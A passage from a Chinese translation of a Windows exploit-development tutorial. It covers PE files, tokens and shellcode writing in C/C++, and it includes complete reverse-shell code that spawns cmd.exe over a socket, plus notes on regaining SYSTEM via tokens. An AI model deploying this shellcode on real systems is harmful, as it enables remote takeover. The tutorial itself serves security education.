0475-Exploit开发系列教程-Windows基础&shellcode-棉花糖会员站

# Exploit开发系列教程-Windows基础&shellcode

from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

Windows基础
=========

* * *

### 0x00 Windows Basics

这篇文章简要讲述Windows开发者应该了解的一些常识。

### 0x01 Win32 API

Windows的主要API由多个DLLs（`Dynamic Link Libraries`）提供。某个应用可以从那些`DLL`中导入函数并且对它们进行调用。这样就保证了普通用户态应用程序的可移植性。

### 0x02 PE文件格式

执行体和`DLL`都是PE(`Portable Executable`)文件。每个PE含有一个导入和导出表。导入表指定导入函数以及这些函数所在的文件（模块）。导出表指定导出函数，等等。函数可以被导入到其它的PE文件。

`PE`文件由多个节（`section`）组成（代码节，数据节，等等…）。在内存中， `.reloc`节中具有重定位可执行体或`DLL`的信息。在内存中，虽然有些代码（例如相对的`jmp`指令）的地址是相对的，但是多数代码所在的地址是绝对的，这取决于被加载的模块。

`Windows loader`从当前工作目录开始搜索`DLLs`，发布的某个应用可能具有一个不同于系统根（`\windows\system32`）目录中的`DLL`。该版本方面的问题（不兼容）被一些人称作`DLL-hell`。

重要的是理解相对虚拟内存地址 (`Relative Virtual Address`，RVA)的概念。`PE`文件提供`RVAs`来指定模块的相对基地址。换句话说，在内存中，如果某个模块在地址B（基地址）上被加载并且某个元素在该模块中具有`RVA`为X这一偏移量，那么该元素的虚拟内存地址（`Virtual Address`，VA）偏移量为`B+X`。

### 0x03 线程

如果你过去经常使用Windows平台，那么应该非常了解线程的概念。但是，如果你经常使用的是Linux，那么请记住，Windows平台将会为线程提供`CPU`时间片。你可以用`CreateProcess()`创建新进程并且用`CreateThreads()`创建新线程。线程会在它们所在进程的地址空间内执行，因此它们所在的内存是共享的。

线程也会被一种称作TLS（`Thread Local Storage`）的机制限制，该机制为线程提供了非共享内存。

基本上，每个线程的`TEB`都含有一个`TLS`数组，它具有64个`DWORD`值，并且在运行过程中超出`TLS`数组的有效元素个数时，会为额外的`TLS`数组分配1024个`DWORD`值。首先，两个数组中的一个数组的每个元素会对应一个索引值，该索引值必须被分配或使用`TlsAlloc()`来得到，可以用`TlsGetValue`(index) 来读取`DWORD`值并用`TlsSetValue`(index, newValue)将其写入。如，在当前线程的`TEB`中，`TlsGetValue`(7)表示从`TLS`数组中索引值为7的地址上读取`DWORD`值。

笔记：我们可以通过使用`GetCurrentThreadId()`来模拟该机制，但是不会有一样的效果。

### 0x04 令牌

令牌通常用于描述访问权限。就像文件句柄那样，令牌仅仅是一个32位整数。每个进程具有一个内部结构，该结构含有关于访问权限的信息，它与令牌相关联。

令牌分为两种类型：主令牌和模仿令牌。无论何时，某个进程被创建后都会被分配一个主令牌。进程的每个线程都可以拥有进程的令牌，或从另一进程中获取模仿令牌。如果`LogonUser()`函数被调用，则会返回一个不能被使用于`CreateProcessAsUser()`的模仿令牌（提供凭据），除非你调用了`DupcateTokenEx`来将其转换为主令牌。

可以使用`SetThreadToken`(newToken) 将某个令牌附加到当前线程并且可以使用`RevertToSelf()`来将该令牌删除，从而让线程的令牌还原为主令牌。

我们来了解下在Windows平台上，将某个用户连接到服务器并发送用户名和密码的情况。首先以`SYSTEM`身份运行服务器，将会调用具有凭据的`LogonUser()`，如果成功则返回新令牌。接着会在服务器创建新线程的同时调用`SetThreadToken`(new_token)，`new_token`参数是一个由 `LogonUser()`返回的令牌值。这样，线程被执行时就具有与用户一样的权限。当线程完成了对客户端的服务时，或者会被销毁，或者将调用`revertToSelf()` 而被添加到线程池的空闲线程队列中。

如果可以控制服务器，那么可通过调用`RevertToSelf()`，或在内存中查找其它的令牌并使用`SetThreadToken()`函数将它们附加到当前线程，从而恢复当前线程的权限，即`SYSTEM`权限。

值得注意的是，`CreateProcess()`使用主令牌作为新进程的令牌。当具有比主令牌更高权限的模仿令牌的线程调用`CreateProcess()`时存在一个问题，那就是新进程的权限会低于创建该进程的线程。

解决方案是使用`DuplicateTokenEx()`从当前线程的模拟令牌中创建一个新的主令牌，接着通过调用具有新的主令牌的`CreateProcessAsUser()` 创建新进程。

shellcode
=========

* * *

### 0x00 介绍

`Shellcode`是一段被`exploit`作为`payload`发送的代码，它被注入到存在漏洞的应用，并且会被执行。`Shellcode`是自包含的，并且应该不含有`null`字节。通常使用函数如`strcpy()`来复制`shellcode`，在进行该复制过程中遇到`null`字节时，将停止复制。这样做会导致`shellcode`不能被完全复制。`Shellcode`一般直接由汇编语言编写，但是，在这篇文章中，我们将通过`Visual Studio 2013`使用`c/c++`来开发`shellcode`。在该开发环境下进行开发的好处如下：

1.花费更短的开发时间。

2.智能提示（`intellisense`）。

3.易于调试。

我们将使用`VS2013`来生成一个具有`shellcode`的执行体，也将使用`python`脚本来提取并修复（移除`null`字节）`shellcode`。

### 0x01 C/C++ 代码

#### 仅仅使用栈变量

为了编写浮动地址代码（`position independent code`），我们必须使用栈变量。这意味着我们不能这么写。

“`
char *v = new char[100];

“`

因为那数组将被分配到栈。根据绝对地址，试着从`msvcr120.dll` 中调用`new`函数：

“`
00191000 6A 64 push 64h
00191002 FF 15 90 20 19 00 call dword ptr ds:[192090h]

“`

地址`192090h`上包含函数的地址。在没有依赖导入表以及`Windows loader`的情况下，要调用某库中已导入的函数，我们必须直接这么做。另一个存在的问题是，新操作符可能需要某种通过`c/c+`+语言编写的运行时组件来完成的初始化操作。

不能使用全局变量：

“`
int x;

int main() {
x = 12;
}

“`

上面的代码 (如果没有被优化)生成如下：

“`
008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov dword ptr ds:[8E9130h],0Ch

“`

地址`8E9130h`为变量x的绝对地址。

如果我们编写如下，会导致字符串存在问题

“`
char str[] = “I’m a string”;

printf(str);

“`

字符串将被放入执行体的`.rdata`节中，并且会对其进行绝对地址引用。

在`shellcode`中不得使用`printf`：这只是一个了解`str`如何被引用的范例。

这是`asm`代码：

“`
00A71006 8D 45 F0 lea eax,[str]
00A71009 56 push esi
00A7100A 57 push edi
00A7100B BE 00 21 A7 00 mov esi,0A72100h
00A71010 8D 7D F0 lea edi,[str]
00A71013 50 push eax
00A71014 A5 movs dword ptr es:[edi],dword ptr [esi]
00A71015 A5 movs dword ptr es:[edi],dword ptr [esi]
00A71016 A5 movs dword ptr es:[edi],dword ptr [esi]
00A71017 A4 movs byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00 call dword ptr ds:[0A72090h]

“`

正如你所看到的，字符串位于`.rdata`节中，地址为`A72100h`，通过`movsd`和`movsb`指令的执行，它会被复制进栈（`str`指向栈）。注意：`A72100h`为绝对地址。显然该代码不是地址无关的。

如果我们这样写：

“`
char *str = “I’m a string”;
printf(str);

“`

那么字符串仍然会被放入.data节，但不会被复制进栈：

“`
00A31000 68 00 21 A3 00 push 0A32100h
00A31005 FF 15 90 20 A3 00 call dword ptr ds:[0A32090h]

“`

字符串在`.rdata`节中，绝对地址为`A32100h`。

如何让该代码地址无关?

更简单的（部分）解决方案：

“`
char str[] = { ‘I’, ‘\”, ‘m’, ‘ ‘, ‘a’, ‘ ‘, ‘s’, ‘t’, ‘r’, ‘i’, ‘n’, ‘g’, ‘\0’ };
printf(str);

“`

对应的汇编代码如下：

“`
012E1006 8D 45 F0 lea eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov dword ptr [str],206D2749h
012E1010 50 push eax
012E1011 C7 45 F4 61 20 73 74 mov dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00 mov byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01 call dword ptr ds:[12E2090h]

“`

除了对`printf`的调用外，该段代码是地址无关的，因为字符串部分被直接编码进了`mov`指令的源操作数中。一旦该字符串在栈上，则可以被使用。

不幸的是，当字符串达到一定长度时，该方法就失效了。代码为：

“`
char str[] = { ‘I’, ‘\”, ‘m’, ‘ ‘, ‘a’, ‘ ‘, ‘v’, ‘e’, ‘r’, ‘y’, ‘ ‘, ‘l’, ‘o’, ‘n’, ‘g’, ‘ ‘, ‘s’, ‘t’, ‘r’, ‘i’, ‘n’, ‘g’, ‘\0’ };
printf(str);

“`

生成

“`
013E1006 66 0F 6F 05 00 21 3E 01 movdqa xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8 lea eax,[str]
013E1011 50 push eax
013E1012 F3 0F 7F 45 E8 movdqu xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67 mov word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00 mov byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01 call dword ptr ds:[13E2090h]

“`

正如你所看到的，当字符串的其它部分像之前那样被编码进mov指令的源操作数中时，字符串部分将被定位在.rdata节中，地址为13E2100h。

我已提出的解决方案如下：

“`
char *str = “I’m a very long string”;

“`

同时使用`Python`脚本修复`shellcode`。该脚本需要从`.rdata`节中提取被引用的字符串，并将它们放入到`shellcode`中，然后修复重定位信息。我们马上会了解到该实现方法。

#### 不直接调用Windows API

在`C/C++`代码中，我们不能编写

“`
WaitForSingleObject(procInfo.hProcess, INFINITE);

“`

因为`kernel32.dll`中已导入了“`WaitForSingleObject`”函数。

在`nutshell`中，`PE`文件含有导入表和导入地址表（`IAT`）。导入表含有被导入到库中的函数的信息。当执行体被加载时，通过`Windows loader`编译`IAT`，并且其含有已导入的函数地址。该执行体的代码用间接寻址调用已导入到库中的函数。例如：

“`
001D100B FF 15 94 20 1D 00 call dword ptr ds:[1D2094h]

“`

地址`1D2094h`为入口地址（在`IAT`中），该地址含有函数 `MessageBoxA`的地址。因为如上调用函数的地址无需被修复（除非执行体被重定位），所以可以直接使用该地址。`Windows loader`只需要修复的是在`1D2094h`地址，该`dword`值是`MessageBoxA`函数的地址。

解决方案是直接从`Windows`的数据结构中得到`Windows`的函数地址。之后我们将会了解到。

#### 创建新项目

通过 `File→New→Project…`, 选择 `Installed→Templates→Visual C++→Win32→Win32 Console Application`, 为项目命名 (我将其命名为 `shellcode`) 接着点击OK。

通过 `Project→ properties` 将出现新会话框。通过将 `Configuration`（会话的左上方）设置为`All Configurations`将修改应用到所有配置（`Release`和`Debug`）。接着，展开`Configuration Properties`并且在`General` 下修改`Platform Toolset` 。该编译器为`Visual C++ Compiler Nov 2013 CTP`(CTP_Nov2013)。

这样你将可以使用`C++11`和`C++14`的一些特性，如`static_assert`。

#### Shellcode范例

这是一段简单的反向`shell`代码（定义）。将命名为`shellcode.cpp`的文件添加到项目中并将该代码复制到`shellcode.cpp`。不要试图理解所有的代码。后面我们还会对其进行进一步的讨论。

“`
// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + “Visual C++ Compiler November 2013 CTP”.

#include                // must preceed #include
#include
#include
#include
#include
#include
#include

#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8)) _inline PEB *getPEB() {     PEB *p;     __asm {         mov     eax, fs:[30h]         mov     p, eax     }     return p; } DWORD getHash(const char *str) {     DWORD h = 0;     while (*str) {         h = (h >> 13) | (h << (32 - 13));       // ROR h, 13         h += *str >= ‘a’ ? *str – 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}

DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}

LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr – list_entry_offset);
}

// NOTE: This function doesn’t work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;

        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);

        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);

    return NULL;            // address not found
}

#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498

#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

int entryPoint() {
//  printf(“0x%08x\n”, getFunctionHash(“kernel32.dll”, “WaitForSingleObject”));
//  return 0;

    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they’re not strictly needed.

    DefineFuncPtr(LoadLibraryA);

    My_LoadLibraryA(“ws2_32.dll”);

    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);

    const char *hostName = “127.0.0.1”;
    const int hostPort = 123;

    WSADATA wsaData;

    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;

    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);

    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);

    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;

    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, “cmd.exe”, NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);

__end:
    My_ExitThread(0);

    return 0;
}

int main() {
    return entryPoint();
}

“`

#### 编译器配置

通过`Project→ properties`, 展开 `Configuration Properties`接着选择 `C/C++`。应用修改后的`Release`配置。

这里是需要修改的设置：

* General:
* oSDL Checks: No (/sdl-)

这可能并不需要，但是我已将它们关闭了。

* Optimization:
* Optimization: Minimize Size (/O1)

这很重要！我们得尽可能将`shellcode`简短。

“`
* Inline Function Expansion: Only __inline (/Ob1)

“`

使用这个设置告诉`VS 2013`只用`_inline`来定义内联函数。`main()` 仅调用`shellcode`的函数`entryPoint`。如果函数 `entryPoint`是简短的，那么它可能会被内联进`main()`。这将是极糟的，因为`main()`将不再透露`shellcode`的后一部分（事实上它包含了该部分）。后面会了解到原因。

“`
* Enable Intrinsic Functions: Yes (/Oi)

“`

我不知道该设置是否应该关闭。

“`
* Favor Size Or Speed: Favor small code (/Os)

* Whole Program Optimization: Yes (/GL)

“`

* Code Generation:
* Security Check: Disable Security Check (/GS-)

不需要安全检查!

“`
* Enable Function-Level linking: Yes (/Gy)

“`

#### linker配置

通过`Project→ properties`, 展开`Configuration Properties`接着查看`Linker`。应用修改后的`Release`配置。这里是你需要修改的相关设置：

* General:
* Enable Incremental Linking: No (/INCREMENTAL:NO)
* Debugging:
* Generate Map File: Yes (/MAP)

告诉`linker`生成含有`EXE`结构的映射文件。

“`
* Map File Name: mapfile

“`

这是映射文件名。可自定义文件名。

* Optimization:
* References: Yes (/OPT:REF)

该选项对于生成简短的`shellcode`来说非常重要，因为可以除去函数以及不被代码引用的数据。

“`
* Enable COMDAT Folding: Yes (/OPT:ICF)

* Function Order: function_order.txt

“`

应用该设置读取命名为`function_order.txt` 的文件，该文件指定必须出现在代码节中函数的顺序。我们要将函数 `entryPoint`变为代码节中的第一个函数，可想而知，`function_order.txt`中必存在一行代码含有字符串`?entryPoint@@YAHXZ`。可以在映射文件中找到该函数名。

#### getProcAddrByHash

该函数返回由某个出现在内存中的模块（`.exe`或`.dll`）导出的某个函hash数的地址，已给出的“值与模块和函数相关联。当然，通过名字查找函数具有一定的可能性，但是这样做需要考虑空间方面的问题，因为那些名字应该被包含在`shellcode`中。在另一方面，一个`hash`仅有4个字节。因为我们不使用两个`hash`（一个用于模块，一个用于函数），`getProcAddrByHash`需要考虑所有被加载进内存中的模块。

通过`user32.dll`导出函数`MessageBoxA`，该函数的`hash`值可通过如下方法计算：

“`
DWORD hash = getFunctionHash(“user32.dll”, “MessageBoxA”);

“`

计算出的`hash`值为`getHash`(“user32.dll”) 与`getHash`(“MessageBoxA”)的`hash`值的总和。函数`getHash`的实现简明易懂：

“`
DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13         h += *str >= ‘a’ ? *str – 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}

“`

正如你可以了解到的，`hash`值是大小写不敏感的（不区分大小写），重要的是，因为在内存中，某种Windows的版本所使用的字符串都为大写。首先，`getProcAddrByHash`获取TEB(`Thread Environment Block`)的地址：

“`
PEB *peb = getPEB();

where

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

“`

选择子`fs`与某个始于`TEB`地址的段相关联。在偏移`30h`上，`TEB`含有一个PEB(`Process Environment Block`)指针。用WinDbg可以观察到：

“`
0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId : _CLIENT_ID
+0x028 ActiveRpcHandle : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread : (null)

“`

`PEB`与当前的进程相关联，除了别的以外，含有关于某些模块的信息，这些模块都被加载到进程地址空间中。此处又是`getProcAddrByHash`：

“`
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);

    return NULL;            // address not found
}

“`

此处为`PEB`部分:

“`
0:000> dt _PEB @$peb
ntdll!_PEB
+0x000 InheritedAddressSpace : 0 ”
+0x001 ReadImageFileExecOptions : 0 ”
+0x002 BeingDebugged : 0x1 ”
+0x003 BitField : 0x8 ”
+0x003 ImageUsesLargePages : 0y0
+0x003 IsProtectedProcess : 0y0
+0x003 IsLegacyProcess : 0y0
+0x003 IsImageDynamicallyRelocated : 0y1
+0x003 SkipPatchingUser32Forwarders : 0y0
+0x003 SpareBits : 0y000
+0x004 Mutant : 0xffffffff Void
+0x008 ImageBaseAddress : 0x00060000 Void
+0x00c Ldr : 0x76fd0200 _PEB_LDR_DATA
+0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
+0x014 SubSystemData : (null)
+0x018 ProcessHeap : 0x00680000 Void

“`

在偏移`0Ch`上，是一个被称作`Ldr`的字段，它是个`PEB_LDR_DATA` 结构指针。使用`WinDbg`进行观察：

“`
0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
+0x000 Length : 0x30
+0x004 Initialized : 0x1 ”
+0x008 SsHandle : (null)
+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 – 0x6862c0 ]
+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 – 0x6862c8 ]
+0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 – 0x6862d0 ]
+0x024 EntryInProgress : (null)
+0x028 ShutdownInProgress : 0 ”
+0x02c ShutdownThreadId : (null)

“`

`InMemoryOrderModuleList`是一个`LDR_DATA_TABLE_ENTRY`结构的双链表，它与当前进程的地址空间中所加载的模块相关联。更确切地说，`InMemoryOrderModuleList` 是一个`LIST_ENTRY`，它含有两个部分：

“`
0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
+0x000 Flink : Ptr32 _LIST_ENTRY
+0x004 Blink : Ptr32 _LIST_ENTRY

“`

`Flink`为前向链表，`Blink`为后向链表。`Flink`指向第一个模块的`LDR_DATA_TABLE_ENTRY` 。当然，未必就是如此：

`Flink`指向一个被包含在结构`LDR_DATA_TABLE_ENTRY`中的`LIST_ENTRY`结构。

我们来观察`LDR_DATA_TABLE_ENTRY` 是如何被定义的:

“`
0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x008 InMemoryOrderLinks : _LIST_ENTRY
+0x010 InInitializationOrderLinks : _LIST_ENTRY
+0x018 DllBase : Ptr32 Void
+0x01c EntryPoint : Ptr32 Void
+0x020 SizeOfImage : Uint4B
+0x024 FullDllName : _UNICODE_STRING
+0x02c BaseDllName : _UNICODE_STRING
+0x034 Flags : Uint4B
+0x038 LoadCount : Uint2B
+0x03a TlsIndex : Uint2B
+0x03c HashLinks : _LIST_ENTRY
+0x03c SectionPointer : Ptr32 Void
+0x040 CheckSum : Uint4B
+0x044 TimeDateStamp : Uint4B
+0x044 LoadedImports : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
+0x04c PatchInformation : Ptr32 Void
+0x050 ForwarderLinks : _LIST_ENTRY
+0x058 ServiceTagLinks : _LIST_ENTRY
+0x060 StaticLinks : _LIST_ENTRY
+0x068 ContextInformation : Ptr32 Void
+0x06c OriginalBase : Uint4B
+0x070 LoadTime : _LARGE_INTEGER

“`

`InMemoryOrderModuleList.Flink`指向位于偏移为8的`_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks`，因此，我们必须减去8来获取 `_LDR_DATA_TABLE_ENTRY`的地址。

首先，获取Flink指针:

“`
+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 – 0x6862c0 ]

“`

它的值是`0x683080`，因此`_LDR_DATA_TABLE_ENTRY` 结构的地址为`0x683080 – 8 = 0x683078`:

“`
0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 – 0x1800eeb1 ]
+0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 – 0x76fd020c ]
+0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 – 0x76fd0214 ]
+0x018 DllBase : (null)
+0x01c EntryPoint : (null)
+0x020 SizeOfImage : 0x60000
+0x024 FullDllName : _UNICODE_STRING “蒮ｍ쿟ﾹ엘ﾬ膪ｎ???”
+0x02c BaseDllName : _UNICODE_STRING “C:\Windows\SysWOW64\calc.exe”
+0x034 Flags : 0x120010
+0x038 LoadCount : 0x2034
+0x03a TlsIndex : 0x68
+0x03c HashLinks : _LIST_ENTRY [ 0x4000 – 0xffff ]
+0x03c SectionPointer : 0x00004000 Void
+0x040 CheckSum : 0xffff
+0x044 TimeDateStamp : 0x6841b4
+0x044 LoadedImports : 0x006841b4 Void
+0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
+0x04c PatchInformation : 0x4ce7979d Void
+0x050 ForwarderLinks : _LIST_ENTRY [ 0x0 – 0x0 ]
+0x058 ServiceTagLinks : _LIST_ENTRY [ 0x6830d0 – 0x6830d0 ]
+0x060 StaticLinks : _LIST_ENTRY [ 0x6830d8 – 0x6830d8 ]
+0x068 ContextInformation : 0x00686418 Void
+0x06c OriginalBase : 0x6851a8
+0x070 LoadTime : _LARGE_INTEGER 0x76f0c9d0

“`

正如你可以看到的，我正在用`WinDbg`调试`calc.exe`！不错：第一个模块是执行体本身。重要的是`DLLBase` (c)字段。根据给出的模块的基地址，我们可以分析被加载到内存中的`PE`文件并获取所有信息，如已导出的函数地址。在`getProcAddrByHash`中我们所做的:

“`
BYTE *baseAddress = (BYTE *)dte->DllBase;
    if (!baseAddress)           // invalid module(???)
        continue;
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
    IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
    DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!iedRVA)                // Export Directory not present
        continue;
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
    char *moduleName = (char *)(baseAddress + ied->Name);
    DWORD moduleHash = getHash(moduleName);

    // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
    // element of both arrays refer to the same function. The first array specifies the name whereas
    // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
    // AddressOfFunctions to find the entry point of the function.
    DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
    for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
        char *functionName = (char *)(baseAddress + nameRVAs[i]);
        if (hash == moduleHash + getHash(functionName)) {
            WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
            DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
            return baseAddress + functionRVA;
        }
    }
    .
    .
    .

“`

了解PE文件格式的规范可以更好地理解该段代码，这里不详细讲解。在PE文件结构中需要注意的是RVA(`Relative Virtual Addresses`)。即相对于PE模块（`Dllbase`）中基地址的地址。例如，如果`RVA`是`100h`并且`DllBase`是`400000h`，那么指向数据的`RVA`为`400000h + 100h = 400100h`。该模块始于`DOS_HEADER` 。它包含一个`NT_HEADERS`的`RVA`(e_lfanew)。`FILE_HEADER`和`OPTIONAL_HEADERNT_HEADERS`存在于`NT_HEADERS`。`OPTIONAL_HEADER`含有一个被称作`DataDirectory`的数组，该数组指向`PE`模块的多个目录。了解`Export Directory`可参考链接[https://msdn.microsoft.com/en-us/library/ms809762.aspx](https://msdn.microsoft.com/en-us/library/ms809762.aspx)中提到的相关细节。

如下C结构体与`Export Directory`相关联，其定义如下：

“`
typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

“`

#### DefineFuncPtr

`DefineFuncPtr` 是一个宏，它有助于定义一个已导入的函数指针. 这是范例:

“`
#define HASH_WSAStartup 0x2ddcd540

#define DefineFuncPtr(name) decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

DefineFuncPtr(WSAStartup);

“`

`WSAStartup`函数是`ws2_32.dll`中已导入的函数，因此通过该方法计算`HASH_WSAStartup`

“`
DWORD hash = getFunctionHash(“ws2_32.dll”, “WSAStartup”);

“`

当宏被展开时,

“`
DefineFuncPtr(WSAStartup);

“`

变为

